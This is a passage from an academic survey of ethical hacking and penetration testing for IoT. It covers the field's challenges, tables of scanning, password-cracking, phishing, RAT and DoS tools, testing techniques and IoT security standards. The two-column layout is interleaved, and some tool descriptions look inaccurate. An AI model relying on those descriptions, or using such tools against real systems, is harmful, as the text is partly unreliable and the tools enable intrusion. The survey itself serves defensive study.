exploited in each phase. Weak security measures and practices are especially in terms of risk management [277]. The capacity is based
also flagged and highlighted to enhance the adoption of more pro- on the limited experienced manpower, and the available resources,
tective and proactive security solutions to reduce the risk of exposure used to perform the penetration testing technique(s) and attack(s).
to cyber-attacks. Risk and vulnerability assessment methods are also Therefore, this is another challenge that requires a deeper focus and
suggested to maintain or reduce risks to an acceptable level. attention in order to address to it.

Cost Challenges: The cost of performing a penetration testing attack
is not cheap, but rather expensive. However, it is necessary to avoid
5.2. Ethical hacking tools
any exploitation of any vulnerability or security gap [276]. In fact,
penetration testing is divided into two main steps. The first one re-
In order to achieve the intended ethical hacking cycle, different tools
quires the identification of already existing exploitable IoT vulnera-
should be used so ethical hackers can perform and conduct their simu-
bilities which requires a defined cost. The next step is based on the
lated attack against any IoT system, server, application or device.
ability to offer security measures to further protect the IoT system,
Furthermore, Tables 5-8, present a summary of the most famous tools
which also requires an additional cost.
used for ethical hacking purposes. To further divides this, Ethical Hack-

Legal Challenges: Many legal challenges also surround the ethical
ing for IoT (EHIoT) can be adopted over different IoT parts including:
hackers within the ethical hacking domain, especially when its con-
ducted against an IoT system or domain. In other terms, ethical
1. Web-based: where EHIoT tools are used to scan web applications and
hackers do not perform their penetration testing without signing a
web-servers to detect security gaps and vulnerabilities to prevent
legal document called the Non-Disclosure Agreement (NDA). This
their exploit by malicious entities. These main tools are summarised
also requires notifying the required authorities so their testing is not
in Table 5.
classified as a cyber-crime. Therefore, without the signing of legal
2. Cloud-Based: where EHIoT tools primary used to track and trace
processes, ethical hackers risk being legally prosecuted and arrested
attacks using forensics tools and also to monitor performance issues
[278]. This is due to the absence of a uniform/universal and legal
and reduce security risks, while trying to re-ensure compliance and
jurisdiction processing system to achieve a unified mutual coopera-
accountability. The main tools are presented in Table 6.
tion between pen testers and ethical hackers.
3. Network-based: where EHIoT tools are used to monitor and scan IoT

Knowledge Challenges: Knowledge challenges are based on the
networks for any security vulnerability or gap, as well as to test the
ability of ethical hackers to perform their penetration testing against
strength of the password/encryption that is used to secure IoT com-
IoT’s exploitable vulnerabilities and security gaps. This includes
munications/connections. These main tools are summarised in
software bug, misconfiguration or other bugs (i.e hardware, config-
Table 7.
uration, or coding). However, their penetration testing and knowl-
4. Application-based: where EHIoT tools are used to evaluate the se-
edge are based on the ability to identify and overcome the only
curity level of IoT applications, and to check if they still perform well
already existing attacks. In other terms, penetration testing is unable
in case of an event taking place, while also adding the forensics part to
to detect new attacks such a zero-day attacks [279]. This is due to
retrieve artefacts in case of attacks. The main used tools are sum-
these attacks being based on exploiting a vulnerability that was not
marised in Table 8.
detected by ethical hackers who were conducting their penetration
testing. This also includes the birthday attack [280,281] in a way,
5.3. Ethical hacking challenges which is quite similar to zero-day. Also, the presence polymorphic
malware [282] and encrypting services that keep on changing their
There are various challenges that the surround the ethical hacking signature and behaviour patterns. Thus, their identification and
domain. In fact, it is very important to highlight them to identify the mitigation process remains as a serious challenge. This is all due to
problem, verify the challenge and overcome them both. However, these their ability to avoid and evade being detected by intrusion detection
challenges are not limited to one or two aspects, but to various different systems, firewalls and anti-viruses.
aspects instead.
Data Management Challenges: especially when it comes to pro-
cessing the intercepted data, which depends on its volume, size, type,

Capability Challenges: Many challenges are related to the lack of compatibility, processing speed, homogeneous/heterogeneous na-
experience and skills gained over time. In fact, there’s a threshold ture, validation, consistency, trust, and location, especially in case
difference between different ethical hacking teams [276]. Moreover, where ethical hackers are dealing with big data [283,284]. This also
there’s no standardised threshold that unifies the skills and experi- depends on data compatibility with the in-use ethical hacking tools to
ence of ethical hackers into a single capability and capacity. There- ensure that the collected data would not result into it being damaged,
fore, some ethical hacking teams may have more skills, experience, altered or modified in a way that damages the IoT system, server,
and knowledge, compared to other groups when performing their application, etc, nor would result into further security breach nor
penetration testing to secure an IoT system/device, along with the information/data leaks.
availability of a much more sophisticated tools and kits.

Table 6
Cloud-based Ethical Hacking tools that can be employed with IoT-Cloud domains.
Tools Definition Description Operating System(s) Tasks Type Programming
Language

Intruder Cloud- Cloud-based Finding Cloud platforms Finding/fixing vulnerabilities Commercial Python
based
LiveAction Cloud- Powerful Network Forensics Mac, Linux, monitors performance issues and reduces security Commercial Cþþ
based Software Windows-based risks using Omnipeek
QualysGuard Cloud- Scalable Online Hacking UNIX, Windows- helps businesses streamline their security and Commercial Java
based Tools based compliance solutions

295
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Table 7
Network-based Ethical Hacking tools that can be employed to detect vulnerability within IoT networks.
Tools Definition Description Operating System(s) Tasks Type Programming
Language

Nmap Network- Network OpenBSD, Solaris, Mac, Computer security/Network management, network Open C, Python, Lua,
based Vulnerability Scanner Linux, Windows-based and port security scanner Source Cþþ
Aircrack-Ng Network- Packet Sniffer/WiFi BSD, Solaris, Supports wireless network security and interface Open C
based Cracker eComStation 2, Mac, controllers Source
Linux, Windows-based
Wireshark Network- Data Packet Analyser BSD, Mac, Linux, Analyses data packets, decrypts many protocols, Open C
based windows-based performs live capture and offline analysis Source
OpenVAS Network- Open Vulnerability Linux, Windows-based Unauthenticated and authenticated testing, uses high- Open C
based Assessment Scanner level and low-level internet/industrial protocols Source
NetStumbler Network- Wireless Networking Windows-based Verifies network poor coverage, detects wireless Open C
based Tool interference/rogue access points Source
Maltego Server- Link Analysis and Mac, Linux, Windows Real-time data mining and information gathering Commercial Python
based Data Mining Tool
Ettercap Network- Network Sniffing BSD/Solaris/MAC, Network/host analysis, Content filtering, live Open C
based Linux, Windows-based connections sniffing Source
John the Network- Password Cracking DOS/Open VMS, Performs dictionary attacks, detects weak UNIX Open C
Ripper based Tool Windows-based passwords Source
Angry IP Network- IP Scanner Tool Mac, Linux, Windows- Scans IP addresses and ports on local networks and Open Java
Scanner based based Internet Source
HOIC Network- Network Stress Mac, Linux, Windows- Denial-of-service application, floods targeted systems Open C#
based Testing Tool based with requests Source
L0phtCrack Network- System Hacking Tool Solaris, BSD, Linux, Deduces passwords, uses password hashes, searches Commercial C
based Windows-based for weak passwords
NetBIOS Netwok- Non-routable OSI Linux, Windows-based Reads/writes on remote systems, initiate DoS attacks Open C
based Session Layer 5 Source
Protocol
The Hydra Network- Fast Network Logon QNX, Mac, Linux-based Password/username guessing, login credential Open Cþþ
based Password Cracking cracking, targets specific ports Source
Tool
Security Event Network- Network Security Mac, Linux, Windows- Detects threats, monitors security policies, and Commercial C and Cþþ
Manager based Event Manager based protects networks
Traceroute NG Network- Network Path ReactOS, Linux, Provides accurate analysis, allows continuous network Open TCL [275]
based Analyser Tool Windows-based probing Source
Kismet Network- Wireless Network Mac, Linux, Windows- Identifies networks, collects packets and detects Open Python, Cþþ
based Scanner Tool based hidden/non-beaconing networks Source
Zenmap Network- Official Nmap BSD, Mac, Linux, Tracks new hosts, new and existing downed services Open Python
based Security Scanner Windows-based Source
Software
SuperScan Network- Network Mapper FreeBSD, Unix, Linux, Scans TCP ports and fixes the issues with hostnames Open Python, C#, Java
based Windows-based and views their response, performs ping and port scans Source and PHP
Hping/Hping3 Network- Network Security BSD, Solaris, Mac, Sends packets and displays target replies, handles Open C/TCL
based Scanner Linux, Windows-based packet body and size, used to transfer files, tests Source
firewall rules, performs port scanning and network
performance
Fluxion Network- Wireless Network Linux, Windows-based Audits the Access Point (AP) security, recovers Wifi- Open Bash, Python
based Security Tool Protected Access (WPA/WPA2) keys, conducts Source
Handshake Snopper and Captive Portal attacks
MAC lookup Network- MAC Address Android Mac, Linux, Identifies the type of the device and the manufacturer, Open Python
based Scanner Unix, Windows-based ensures real-time geographical location Source

Forensics Challenges: in many cases the use of forensics and anti- hackers lacking skills, experience and knowledge for a start [288]. There
forensics in the phase to cover tracks is not always taken into is also different varieties of performing different ethical hacking tests. As
consideration, or it was lightly considered. This, in turn, proves to be a result, these varieties have their own advantages and drawbacks.
challenging for ethical hackers to fulfill the whole ”hacking phase”, However, there are far more important issues that require attention first.
which on the same time would also affect how First Incident Re-
sponders Team (FIRT) would react and what forensics tools do they
Privacy: The privacy issue must be taken very seriously, especially
need to use to track and trace the attacker and counter his use of anti- when an IoT system’s vulnerability is being exposed due a simulated
forensics tools [285]. penetration testing attack being conducted by ethical hackers. Such a

Cloud Computing Challenges: cloud computing is one of the main simulated attack mainly targets the privacy of this organisation
key challenges that surround the ethical hacking domain [286], including data, information, and user’s privacy [289].
especially since according to FinTech News, attacks against cloud
Security: Security issues are more related to the lack of experience,
computing increased by 630% between January and April 2020 knowledge and skills among the ethical hacking team that is per-
[287]. These attack included data breaches, malware injection, DoS, forming the penetration testing [290]. It is also related to the weak
and account hijacking. security measures and access control mechanisms employed by a
given organisation to protect itself from any given physical access
attempt(s).
5.4. Ethical hacking issues
Trust: issues are primary related to fully trusting a third (suspicious)
party [291] in order to evaluate the IoT system’s security level(s)
Ethical hacking has been prone to lots of different issues that sur- [292]. In fact, performing penetration testing would allow ethical
round this domain, especially when being applied on IoT, due to ethical

296
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Table 8
Application-based Ethical Hacking tools that can be employed to detect security vulnerabilities/gaps found within IoT entities (End devices with OS, Servers/Fog), in
addition to user desktop or mobile.
Tools Definition Description Operating System(s) Tasks Type Programming
Language

Metasploit Application- Anti-forensic Tool Builder Mac, Linux, Covering Tracks/artefacts, provides remote Open Perl
based Windows-based machine testing, understand security Source
vulnerabilities
Metasploit Pro Application- Pen Testing Software Mac, Linux, Develops and executes exploit codes against Commercial Ruby
based Windows-based remote machines, create security testing tools
Kiuwan Application- Code Security Unix, Mac, Linux, Reviews software source codes to identify Commercial Java
based Windows-based sources of vulnerabilities
SET Application- Social Engineering Toolkit Mac, Linux-based Provides a phishing utility, performs social Open Python
based engineering activities Source
njRAT Application- RAT Hacking Tool Linux, Windows- Gets remote access, registers keystrokes, steals Commercial Python
based based passwords, activates webcam
Sn1per Application- Automated Security Linux, Windows- Duplicate sites for phishing and social Open Ruby
based Vulnerability Scanner based designing purposes Source
Cain and Abel Application- Password Recovery Tool Windows-based Sniffs networks, recovers MS Access passwords, Open Visual Cþþ
based and cracks encrypted ones Source
Hashcat Application- Robust Password Cracking Mac, Linux, Recovers lost passwords and audits password Open- OCL and C
based and Ethical Hacking Tool Windows-based security Source
RainbowCrack Application- Password Cracking and Linux, Windows- Generates rainbow tables for password Commerical Python
based Ethical Hacking Tool based cracking, while reducing the time length
IKECrack Application- Authentication Cracker Tool Mac, Linux, Performs brute-force/dictionary attacks, Pre- Open- C, Perl
based Windows-based Shared-Key analysis and cryptography tasks Source
Medusa Application- Best Parallel Password SunOS, BSD, Linux, Supports many services with remote Open- Python, Ruby
based cracker Tool Mac, Windows-based authentication, performs Thread-based Source
parallel/Brute-force testing

hackers to know all information about the organisation. This includes hackers, and how ethical hackers perform their duties and tasks.
their exploitable vulnerabilities and available security gaps. Penetration tests are conducted to evaluate the levels of IoT security

Legal and Law Issues: issues are highly emerging, especially since and immunity of a given IT and non-IT systems and personnel against
ethical hackers need to perform a simulated cyber-attack or/and security gaps and/or exploitable vulnerabilities [297] from already
hacking which, in real cases, would be classified as a cyber-crime known or unknown attacks. A vulnerability can possibly exist in an OS
[293]. Therefore, the reliance on signing a non-disclosure agree- due to design flaw, mis-configuration, software bug or even failure.
ment to protect both sides is mandatory. Moreover, when performing Therefore, the aim of penetration testing is to safeguard the information
simulated insider attacks, police law enforcement and local author- from any alteration, modification or disclosure from already known
ities must be notified, so that in case the organisation managed to threats and/or attacks. As such, different security measures were sug-
capture an ethical hacker, there will not be any prosecution(s) nor gested and presented by different papers including [298,299]. Such pa-
arrest(s). Therefore, this is another important issue that requires some pers, presented the implementation of the right Access Control
serious attention. mechanisms, along with a strong authentication process. This was

Forensics: Many ethical hackers lack the ability to make use of accompanied by the implementation of additional firewalls, Intrusion
forensic tools and techniques to retrieve any data from logs and audits Detection/Intrusion Prevention systems, and cryptographic mechanisms
to check for failed login attempt(s) or abnormal network behaviour. to protect data’s Confidentiality, Integrity and Availability (CIA), as well
In some cases, ethical hackers rely on the use of anti-forensic tech- as privacy and authentication.
niques to simulate an advanced attack to uncover the attacker’s Penetration testing has its own advantages and drawbacks that one
track(s). This method is performed and applied in order to check the must understand before diving deeper into the this subject, especially
ability of a given organisation to defend, detect and locate the when its being applied to the IoT domain. The main advantages of
attacker. In fact, it is classified as another issue, where most ethical penetration testing are based on ensuring the right evaluations through
hackers have little knowledge in the digital forensics domain [10,11, the tests to achieve a proactive security approach [297]. Such approach
294], including cloud forensics [258], mobile/computer forensics allows the exploration and detection of security risks accurately, whilst
[295], and web-applications [296], especially when these fields are ensuring a system’s adaptation to real-time changes. Moreover, pene-
linked and connected to the IoT domain. tration testing helps with the investigation of data breaches and network

Budget Constraints: are still challenging since the budget limit is not intrusions. As a result, advanced penetration testing was introduced in
sufficient to purchase a software package quality to use it on different Ref. [300], based on the latest available security exploitation and
IoT devices. research. Unlike traditional penetration testing, the organisation is made

Compatibility Issues: are still challenging as its still difficult to aware of the importance and reliance on solid, well-built incident
conduct ethical hacking tasks due to them requiring a specialised response team and program to adhere to any emerging threat before it
interface, hardware/software, and locating/extracting digital file even occurs [301].
systems from volatile/non-volatile computer memory. This also raises
compatibility issues due to having different manufacturers.
6.1. Penetration testing tools

6. Penetration testing
To ensure the most effective and successful penetration testing for
IoT, different tools are being effectively used for this specific task, of
Penetration testing requires the presence of ethical hackers in a
which many in-use tools were presented in Ref. [258], with a brief
certified/verified professional way that guarantees their safety and the
comparison between vulnerability assessment and penetration testing
organisation’s safety and security in any IoT domain. Therefore, it is
being made in Ref. [302]. Nonetheless, these main penetration testing
highly important to know how penetration testing is linked to ethical
tools will be highlighted and summarised in Table 9.

297
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Table 9 testing in order to evaluate the level of security and immunity of a given
Famous penetration testing tools that can be used on IoT devices, servers in organisation in each tested case [304,305].
addition to user(s) devices that have operating system. Moreover, box testing technique are presented in Table 10.
Penetration Testing Tools Description

Acunetix Scans and detects web vulnerabilities including XSS, SQL

White-Box Testing: is also known as open box testing [306]. It is
Injection, Code execution and File inclusion/upload form based on having full knowledge regarding the intended and targeted
Burp Suite Used for Pen-Test and security websites, capable of Proxy IoT system in addition to all its software and firmware components.
Interception, write plugins, and Automatic vulnerability White box testing is based on the attacker’s ability to have an insider
detection
(i.e whistle-blower) with a full knowledge over how a program runs.
Backbox Linux Focuses on penetration testing and safety assessment and
penetration testing, mainly used for the analysis of web However, White-Box testing is less time consuming since there’s a
applications and networks prior full knowledge of the IoT system. This makes it very suitable for
Kali Linux An advanced penetration testing and Security Auditing, testing algorithms. It also ensures that all logical decisions are being
with hundreds of tools to perform PenTesting, Forensics verified, and ensures syntax checking with any possible design error.
and Reverse Engineering, and other wireless, web an
network security analysis

Grey-Box Testing: is also known as translucent testing. It is based on
Nessus Deals with a large number of network devices, also used having a secondary knowledge about the IoT system, due to the in-
for web applications penetration testing ternal programming being partially known. Unlike White box testing,
Parrot Security OS Highly efficient lightweight OS designed for ethical it is not time consuming [307]. However, it is not suitable for testing
hacking, computer forensics testing, cryptography and
algorithms. In fact, it is non-intrusive and unbiased, with the least risk
other security tasks
Samurai Web Testing Preconfigured framework that functions as a web pen of conflicts between testers and developers.
Framework -testing platform, capable of detection website code
Black-Box Testing: can also include application black-box testing
vulnerabilities [308]. In fact, testers do not have any prior knowledge regarding the
SQLmap Automated command line capable of detecting and internal/external IoT system, nor over the software and firmware
exploiting any SQL Injection vulnerability, whilst
structure used [306]. Moreover it can also be tested on android ap-
extracting information from databases
plications [309]. As a result, such a test is conducted based on the
user’s perspective and not the designer’s perspective. Despite that the
6.2. Penetration testing knowledge types program used is not known. A pen-tester may be an expert, since
testers rely on any system contradictions. This testing form is very
Penetration testing knowledge is usually divided into three main time consuming as there is no prior knowledge to the tested system.
types [303]. Each type is classified as part of the conducted penetration However, it is not useful for testing algorithms, nor complex segments
of code since many program paths are left untested. In fact, it is also
known as Behavioural Testing and can either be functional or
Table 10 non-functional.
Existing Box testing Techniques [306,307].
Testing Testing Technique Description
Type 6.3. Penetration testing appliance
White Box Statement Coverage Used to test every statement more than
Testing once. Tool in use: Cantataþþ Penetration Testing can also be applied to other IoT domains such as
Decision Coverage Used to test every decision condition the applications and networks domains. In fact, it is applied to evaluate
including conditional loops more than
once. Tool in use: TCAT-PATH
the levels of security in a given application and network both internally
Condition Coverage Ensures a one-time code execution and externally, to avoid any possible exploitation. In other terms, pene-
mandatory once conditions are tested tration testing can be applied in application penetration testing, internal/
Decision/Condition Used to test all the Decision/Condition external network penetration testing, and infrastructure/application
Coverage coverage during the code execution
penetration testing.
Multiple Condition Each system entry point is executed more
Coverage than once
Black Box Finds errors in the Finds errors in the input values
Application Penetration Testing: including mobile and web appli-
Testing input values boundaries cation pen testing [310], aims to reveal possible application vulner-
boundaries abilities, security risks, weaknesses and flaws by relying on real-case
Equivalence Class Excessive application testing to input
Partitioning redundancy. Inputs divided into classes
strategies and attacks. This is done via a close cooperation and
with values for each class collaboration in-between IoT applications and IT infrastructure
Decision Table Based Employed when the action is applied through servers, networks and devices alike to detect and overcome
Testing under unstable varying conditions any exploitable vulnerability or security gap. Application and Web
Cause-Effect Graphing Operates on a system’s external behaviour
Application penetration testing focuses on reviewing the author-
Technique only, and helps selecting and creating test
cases isation, data protection and security configuration mechanisms.
Error Guessing Success rate depends on the experience of
Internal & External IoT Network Penetration Testing: aims to
the tester. Test cases are written while detect the main IoT network vulnerabilities [311] by conducting a
reading a document or when encountering series of simulation attack scenarios using the Kali Linux Operating
an undocumented error
Grey box Matrix Testing Defines all the existing variables on a
System platform [312]. It tries to identify the exploited vulner-
Testing given program ability(ies) or/and security gap(s) along the path of the attack in order
Regression Testing Relies on retest all, retest risky use cases, to assess its likelihood and impact. Thus, offering the necessary rec-
retest within a firewall strategies to check ommendations to protect a network both internally and externally.
if previous changes regressed other

Cloud Penetration Testing: is applied to the cloud infrastructure
program’s new version aspects
Pattern Testing Goes through the code to identify the domains as part of pen testing in clouds or cloud pen testing [313]
cause of failure by retrieving historical and includes both corporate applications and integrated networks
data of the previously defected system [314]. The aim is to identify any attack’s path based on identified
Orthogonal Array Offers the most code coverage with the security gap, while assessing the likelihood and impact of a similar
Testing least test cases
potential attack type against the IoT in cloud [315].

298
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

6.4. Existing solutions various setbacks related mainly to the high expertise and flexibility re-
quirements. In Ref. [326], Bailey et al. presented an innovative approach
To ensure a much more accurate and successful penetration testing based on an ethical hacking game, Self-Adaptive Authorisation Frame-
process, various solutions were presented using different techniques and work (SAAF), which is protected by a self-adaptive authorisation infra-
tools to safeguard and maintain a secure IoT environment. Different structure to allow the observation of the user’s activity
protective precautions and actions have been already taken into pre/post-adaptation. Live experiments managed to capture a wide
consideration [12] to protect a system from any cyber-attack based on range of malicious behaviour, related to exploiting vulnerabilities, in an
ethical hacking techniques, rather than only training managers [316]. effective and efficient manner without any administrator interference.

Ethical Hacking: is an essential method to simulate the lifecycle
Penetration Testing: Penetration testing is an essential method to
adopted by a hacker or an attacker to simulate an attack against an reveal how a system or network is vulnerable or how the adopted
IoT system, application/OS, or network. Therefore, a variety of so- security measures suffer from an exploitable security gap. As a result,
lutions was presented. Greenwald et al. developed a methodology various solutions were presented. Rushing et al. described a software
that provides an automated generation and execution of remote project named Collaborative Penetration-testing and Analysis Toolkit
testing plans by using modeling techniques from partially observable (CPAT) that helps network security analysts with performing pene-
Markov decision processes (POMDPs) [317]. The authors demon- tration tests by using network analysis technologies and tools in a
strated the efficiency of the approximation algorithm used to satisfy collaborative environment with reactive data management [327].
performance requirements of penetration test planning. Trivedi pre- However, results are still to be reported. Visoottiviseth et al. devel-
sented an online comprehensive solution for network administrators oped a PENTOS as a penetration testing system for IoT devices
that use popular exploits and network intrusion tools on their own designed for ethical hacking and used to determine both IoT risks and
private network to detect any breach/flaw and preserve confidential vulnerabilities [328]. Moreover, PENTOS offers penetration testing
data [318]. As a result, an IDS was presented to prevent on IoT devices including password, web, and wireless attacks fol-
cross-scripting vulnerabilities. lowed by a summary on the result of attacks while offering security
recommendations.
In [319], Lu et al. analysed the Shadowcrew network to examine the
social organisation of a hacking community using social networking Ning et al. presented a penetration attack tree model that describes,
methods for text mining and network analysis. Their analysis revealed organises, classifies, manages, and schedules the attacks for Attack
the hackers’ decentralized network structure as well as their organisa- Resistance Test (ART) [329]. Results show how this model offers a
tion’s structure. Zhou et al. presented a system that offers ethical hackers detailed description of the logical relationship of attacks while providing
computer forensics training to maintain data protection under attack, guidance for penetration attacks. Almubairik et al. presented a systematic
while also analysing the organisation’s security policies and strategies penetration testing algorithm guided by a threat model to ensure that all
[320]. Thus, offering a proper Analysis System for Computer Forensic threat models are checked [330]. The appliance of this model to a real
Education, Training & Awareness (ASCFETA) plan. However, the system system reduced the consequences that can result from malicious attacks
is prone to various limitations including the accuracy of data-limits, in a shorter time since the tester is relieved from monotonous tasks.
which affect the decision-making process. In Ref. [321], Alazab et al. However, further research is required to cover other threats such as SQL
surveyed the existing trends in crime toolkits and offered a case study on threats, cross-site scripting, and mail threats.
the Zeus botnet. Bechtsoudis et al. revealed how a comprehensive security level can be
A variety of exploit types was presented to predict future attack reached through extensive Penetration Tests (Ethical Hacking) [331]. A
trends, while stating that security measures such as behavioural analysis Penetration Test methodology and framework were presented to expose
or whitelists are necessary as countermeasures. In Ref. [201], Sood et al. any exploitable vulnerability per network layer. Results show how a
analysed the components and techniques used by the SpyEye botnet common network mis-configuration was exploited to compromise the
malware and presented an example and analysis of the third-generation internal network. This provided evidence on how regular penetration
botnets. The analysis was a static-behavioural one to understand tests must be conducted on the organisation network. Jiajia offered a
SpyEye’s characteristics and exploitation techniques. In Ref. [322], penetration testing method based on mobile internet that uses the actual
Abbasi et al. presented a scalable and generalised framework that iden- network to build a platform to complete the plan of executing a pen test
tified expert hackers and characterised their specialities by analysing based on the existing vulnerabilities of mobile internet [332]. Results
their forum content on social media platforms, using text analytics for a show that the mobile communication terminal is mostly affected by the
key hacker identification and analysis. Results revealed the hackers’ web pressure test and the energy consumption. In Ref. [333], a mobile
interaction network along the content-based clustering of key actors penetration testing specialised company named Attify, started giving
within the hacking community. Angmo et al. discussed and analysed the courses, writing books and conducting live penetration testing on
use of selenium suite in Ref. [323], which combines different automated different IoT domains to offer a more secure use of mobile devices.
testing tools and provides testers with various frameworks for different Lastly, Hu et al. presented an automated penetration testing frame-
web testing cases. A performance evaluation shows how the selenium work that employs deep reinforcement learning based on the Deep Q-
web-driver is a better tool than Watir web-driver. Learning Network (DQN) method to help with the automation of the
In [316], Hajdarevic et al. addressed the threat of resource starvation penetration testing process. This framework can also be used for defense
attacks by presenting a simulation-based training scenario that allows training by recreating simulated attacks in the training environment
trainees to experience the effect of new/old DDoS attack forms and how [334]. Optimal results show that DQN’s accuracy in fighting the optimal
to initiate a response in a simulated environment. However, accurate attack path is 86%
results were not offered. Sandhya et al. presented an approach based on
the use of the Wireshark packet sniffing tool to allow ethical hackers to
Vulnerability Assessment: VA solutions are presented to assess and
reveal the system security flaws at the user authentication level to check evaluate the threats related to IoT websites, networks, OS/applica-
whether a website is secure or not [324]. The adoption of this approach tions, and devices through simulation attacks to prevent their
offered a faster vulnerability identification at a higher success rate. In exploitation. As a result, various VAPT tools are presented. Shah et al.
Ref. [325], Tetskyi et al. described the web service design that relied on worked on developing NetNirikshak 1.0 as a new automated
the use of neural networks to create a decision support tool for web ap- Vulnerability Assessment and Penetration Testing (VAPT) Tool to
plications penetration testing. However, this solution was prone to address the threats that target data/services’ Integrity and

299
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Confidentiality [335]. NetNirikshak 1.0 was reportedly useful against 7.1. IT security policy
SQL injection (SQLi) vulnerabilities while tracing back the source of
the attack. However, NetNirikshak 1.0 is only limited to the SQLi and A great deal of emphasis should be placed on the security and safety
cannot detect Cross Site Scripting (XSS), OS Command Injection, etc. procedures, where each employee must respect and adhere to in any IoT
domain. This can only be achieved through continuous training and
Goel et al. explained how the VAPT concept can be used as an awareness while maintaining accountability. The list of various policies
effective cyber defence technology, while offering further details about involved in the process is presented below:
VAPT’s life cycle, and techniques along the top 15 vulnerability assess-
ment tools [257]. The authors presented an Ensemble approach called 1. Adoption of Cyber-Security for IoT standards: which are essential
’VEnsemble 1.0’ model that combines multiple VAPT tools (open sour- to maintain the right security measures and standards that are
ce/premium) to achieve a higher accuracy than previous solutions [336]. compatible with the IoT market (i.e users, customers, manufacturers,
Simulations show how VEnsemble 1.0 offers a higher accuracy in etc) and domain (IoT servers, systems, devices, etc).
detecting different types of vulnerabilities at a reduced cost.
ETSI EN 303 645: ETSI EN 303 645 v2.1.1 is a global standard that
The above solutions are summarised in Table 11. is applicable for consumer IoT cyber security, which covers all
consumer IoT devices with a good security baseline being estab-
7. IoT Security & Safety Procedures lished [337]. It consists of 13 high-level recommendations to
establish 35 recommendations, 68 provisions, 33 mandatory re-
Despite the different preventive and protective IoT security measures quirements. This standard serves as a guidance tool for IoT manu-
being recommended, many steps need to be considered to ensure that the facturers as it also offers examples of how each provision’s
adopted security and safety measures are both enforced and properly implementation can be provided [338]. A test specification was
introduced into the IoT domain. As a result, (first) incident responders also released by the European Telecommunications Standards
must be distinguished and classified to maintain the right response Institute (ETSI) named ETSI TS 103 701, to describe in a compre-
against a given event(s). Once achieved, preventive and protective se- hensive way how conformity assessment can be achieved, to
curity measures must be employed for further protection. Finally, these harmonize the evaluation methodologies and support manufac-
security measures must be employed to maintain and ensure the right turers, suppliers for their internal security processes [339].
level of protection, while respecting the main security goals.
NISTIR 8259: provides guidance for both manufacturers and their
supporting third parties to design, test and support IoT devices. The
series consists of three final documents and one draft document
Table 11 [340].
Existing solutions of Penetration Testing that can be applied to IoT.
NISTIR 8259: includes recommendations for IoT device
Year Reference Authors Solution Details manufacturers.
2008 [329] Ning et al. Penetration List and description
NISTIR 8259A: includes the IoT core device cyber-security tech-
testing Solutions of existing PT nical capability baseline [341].
solutions
NISTIR 8259B: includes the IoT non-technical supporting capa-
2010 [318] Trivedi et al. Comprehensive Analyses any bility core baseline [341].
online tool [WR- network security

NISTIR 8259C (DRAFT): creates a profile using the IoT Core and
3] flaw
2012 [320] Zhou et al. ASCFETA Part of an Non-Technical Baselines (NISTIR 8259A/B) to create tailored IoT
Organisation’s cyber-security requirements sets [342].
security policy
2013 [321] Alazab et al. Crime tool kit Study of malware
7.2. Incident response
investigation type, variation &
quality
2014 [335] Shah et al. “Net-Nirikshak Facilitates VAPT in In case of an incident, a response is automatically triggered, where
1.0” model Indian banks responders are called upon the occurrence of a security event for them to
2014 [322] Abbasi et al. Social media Extracts interactions respond with the right security measures and countermeasures to miti-
analytical model between users &
gate any attack that targets the IoT domain in a real-time manner and
hacking communities
2015 [327] Rushing et al. CPAT Suitable for reduces the risk’s occurrence and likelihood. Such responses can either
penetration testing be active, passive, or hybrid. This depends on the responders’ training,
data reconnaissance skills, experience, available resources, and manpower, as well as on the
phase
attacker’s motives and gains. As such, they can be classed as active (i.e
2016 [336] Goel et al. “VEnsemble 1.0” A VAPT that detects
approach different
ability to “counter-back” any given attack against an IoT system [343]),
vulnerability types passive (i.e taking defensive counter-measures to overcome it) or hybrid
2016 [330] Almubairik Threat model Evaluates the (i.e using a ”Smart Response” using smart AI-based security measures).
et al. driven approach immunity of tested Preventive and protective security measures can be adopted to protect
systems against
IoT’s network, system and users’ data [344], such as the use of symmetric
attack types
2017 [328] Visoottiviseth PENTOS Determines risks/ encryption [345,346] including the post-quantum cryptography [347,
et al. vulnerabilities of IoT 348].
devices
2017 [324] Sandhya et al. Use of Wireshark Assesses website
8. Learnt lessons
security
2018 [325] Tetskyi et al. Neural Network Creates decision
based support tool for Web After conducting this survey, the main weak and strong points of
application penetration testing for IoT are identified, along with those found in the
penetration testing ethical hacking domain.
2018 [326] Bailey et al. Ethical game of Handles malicious
hacking behaviour of real &
intelligent users

300
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Standard Security Solutions: are required and more specialised from further spreading and damaging the IoT system, network, applica-
security (counter) measures should be applied instead, as vulnera- tion, or device.
bilities differ from one IoT device, system, or protocol to another. This
is due to the heterogeneous nature of IoT devices, protocols, oper-
Enable smart automated PT Solutions: which should be enabled in
ating systems, etc, making them more prone to a larger variety of a real-time manner to achieve the necessary functionalities of IoT
different and dangerous vulnerability types and exploitable security entities and application requirements. This can be achieved by relying
gaps. on AI-based solutions which play a key role in detecting security

Continuous Security/Awareness Training: which is recommended vulnerabilities.
while adopting specialised security guidelines, especially account-
Enhanced IoT Corrective Solutions: must be maintained to ”cor-
ability, depending on the IoT layers, systems, devices, etc, as well as rect” and overcome detected IoT security vulnerabilities. This in-
the adoption of seminars and training sessions to keep the users cludes enhanced Intrusion Prevention Systems, and next-generation
posted and updated. firewalls while ensuring a secure and verified data backup, with

Enhanced Security Designs: which are essential ahead of their alternative devices being available for necessary computational
implementation and adoption using ethical hacking and penetration requirements.
testing tools for IoT, which can be built based on the Artificial In-
telligence (AI) based on Machine Learning (ML) solutions to ensure on the other hand, existing PT detection solutions (network or host) or
higher accuracy and reduce false negatives and false positives with a correction ones can benefit from the advancements of AI to enhance PT
lesser response time to react and interact. accuracy level.

More Investment: is needed in this domain, which requires a higher
budget to be spent to raise awareness, train uniform/non-uniform 10. Suggestions & recommendations
personnel, assert both responsibility and accountability, as well as
to train more ethical hackers and penetration testers to specialize, Despite having different IoT security measures available for imple-
improve their knowledge, experience, skills and available tools. mentation and deployment, in this paper we present several suggestions

